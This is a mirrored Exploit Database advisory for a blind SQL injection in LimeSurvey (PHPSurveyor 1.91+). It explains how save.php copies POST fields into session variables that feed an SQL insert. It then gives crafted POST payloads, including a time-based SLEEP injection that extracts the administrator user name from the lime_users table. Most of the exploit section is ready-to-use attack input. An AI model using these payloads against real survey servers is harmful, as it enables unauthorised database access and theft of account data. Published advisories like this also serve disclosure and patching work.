LimeSurvey (PHPSurveyor 1.91+ stable) – Blind SQL Injection

• Exploit Database
• 37 阅读

• 作者： TorTukiTu
  日期： 2012-02-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18508/

• # Exploit Title: LimeSurvey Blind SQL injection
  # Date: 20/02/2012
  # Author: TorTukiTu - OpenSphere
  # Version: 1.91+ build 11804
  # Tested on: php
  
  {cke_protected}{C}{cke_protected}{C}
  
  -------------------------------------------------------------------------
  
  
  # TorTukiTu - Killing Tortoise
  
   
  #,-"""-. 
  # oo._/ \___/ \ 
  #(____)_/___\__\_) 
  #/_// \\_\ 
  # 
  
  
  
   
  
  # Cookie hacking + Blind SQL Injection
  
   
  
  # The vulnerability occurs when a user answers a survey (index.php).
  
  # The session variables can be freely hacked using the following lines in save.php l.82 :
  
  # if (isset($_POST[$pf])) {$_SESSION[$pf] = $_POST[$pf];}
  
  #if (!isset($_POST[$pf])) {$_SESSION[$pf] = "";}
  
  # $pf is user input in the POST variable
  
  # once splitted, SQL request is directly build from those sessions variable by function createinsertquery(),
  
  # if a special Post variable 'srid' is set both in the variable
  
  # 'fieldnames' and as simple POST variable (query l. 715 save.php).
  
  # The user can realize blind SQL injections with specially crafted POST variables.
  
   
  
  # Normal POST variables example:
  
   
  
  fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003
  
  MULTI17165X6X18=8
  
  tbdisp17...
  
  ...
  
  start_time=1329742665
  
   
  
  # Craft POST variables like this :
  
   
  
  fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C[VALID FIELD ID]` = [SQL INJECTION]--%7Csrid
  
  MULTI17165X6X18=8
  
  tbdisp17...
  
  ...
  
  start_time=1329742665
  
  srid=[SOME INTEGER]
  
   
  
  #Example : Blind SQL user name guessing :
  
  fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C17165X6X18SQ001` = NULL WHERE id=6 AND id IN ( SELECT IF ( (SELECT SUBSTRING(users_name,1) FROM lime_users WHERE uid=1) LIKE 'a%', 1, SLEEP(5)))--%7Csrid
  
  MULTI17165X6X18=8
  
  tbdisp17...
  
  ...
  
  start_time=1329742665
  
  srid=42
  
   
  
   
  
  -------------------------------------------------------------------------